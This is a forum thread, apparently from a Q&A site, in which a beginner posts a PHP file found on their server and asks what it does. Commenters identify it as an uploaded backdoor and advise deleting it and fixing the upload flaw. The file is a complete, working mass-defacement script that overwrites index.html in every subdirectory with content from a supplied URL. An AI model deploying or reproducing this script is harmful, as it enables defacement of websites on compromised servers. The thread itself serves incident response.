5
I am beginner in the area and found this file inside my server :
<?php
/*
Script: Mass Deface Script
*/
echo "<center><textarea rows='10' cols='100'>";
$defaceurl = $_POST['massdefaceurl'];
$dir = $_POST['massdefacedir'];
echo $dir."\n";
if (is_dir($dir)) {
if ($dh = opendir($dir)) {
while (($file = readdir($dh)) !== false) {
if(filetype($dir.$file)=="dir"){
$newfile=$dir.$file."/index.html";
echo $newfile."\n";
if (!copy($defaceurl, $newfile)) {
echo "failed to copy $file...\n";
}
}
}
closedir($dh);
}
}
echo "</textarea></center>";
?>
<td align=right>Mass Defacement:</td><br>
</div>
<form action='<?php basename($_SERVER['PHP_SELF']); ?>' method='post'>
<div class="style31">
[+] Main Directory: <input type='text' style='width: 250px' value='<?php echo getcwd() . "/"; ?>' name='massdefacedir'>
[+] Defacement Url: <input type='text' style='width: 250px' name='massdefaceurl'>
<input type='submit' name='execmassdeface' value='Execute'></div>
</form></td>
Can help me understand what this file was running ?
possibly a backdoor that someone has uploaded to your site. Delete this file and check its upload as it is allowing you to upload files of the php type.
– Adir Kuhn
I wouldn’t say "possibly", but "quite possibly" kkkk
– Wallace Maxters
I’d say for sure ;)
– Jorge B.
Make a copy to your personal computer where it can’t be used remotely. and delete it from the server now. And review what you have on your server, that somehow there’s a security breach.
– Jorge B.
Yes, indeed a security flaw, but what he’s executing ?
– Cesar Lima Paulo
@Cesarlimapaulo see Marcelo’s answer.
– Jorge B.